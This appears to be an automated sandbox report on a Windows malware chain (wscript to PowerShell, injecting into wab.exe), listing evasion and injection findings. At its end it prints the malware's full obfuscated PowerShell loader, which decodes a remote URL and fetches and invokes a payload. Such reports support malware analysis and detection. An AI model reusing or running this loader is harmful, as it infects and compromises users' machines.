                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 3EE1B0F
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6347Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3527Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7566Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2194Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 758Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 8707Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1759Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.6 %
                Source: C:\Windows\System32\wscript.exe TID: 7048Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1808Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6280Thread sleep count: 7566 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6280Thread sleep count: 2194 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5156Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6912Thread sleep time: -134000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6408Thread sleep time: -2274000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6408Thread sleep time: -26121000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_213610F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21366580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,10_2_21366580
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,14_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407898
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00418981 memset,GetSystemInfo,14_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: powershell.exe, 00000005.00000002.2520001892.0000000007A77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                Source: powershell.exe, 00000002.00000002.2660345822.00000284A5265000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
                Source: wscript.exe, 00000000.00000003.2094969947.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094557386.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094849673.00000222CB520000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2096463612.00000222CB521000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095846541.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2096763553.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095487135.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087476305.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2091106100.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089840993.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3372008001.00000000057FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: bhvEF08.tmp.14.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                Source: wscript.exe, 00000000.00000002.2097022655.00000222CD3F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}w
                Source: wscript.exe, 00000000.00000003.2094557386.00000222CD3A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\S
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_15-34129
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04EA9AD9 LdrInitializeThunk,5_2_04EA9AD9
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213660E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_213660E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,14_2_004044A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21364AB4 mov eax, dword ptr fs:[00000030h]10_2_21364AB4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136724E GetProcessHeap,10_2_2136724E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213660E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_213660E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21362B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_21362B1C
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21362639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_21362639

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_3516.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3516, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5512, type: MEMORYSTR
                Maps a DLL or memory area into another process
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3A70000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 69F8D0Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerJump to behavior
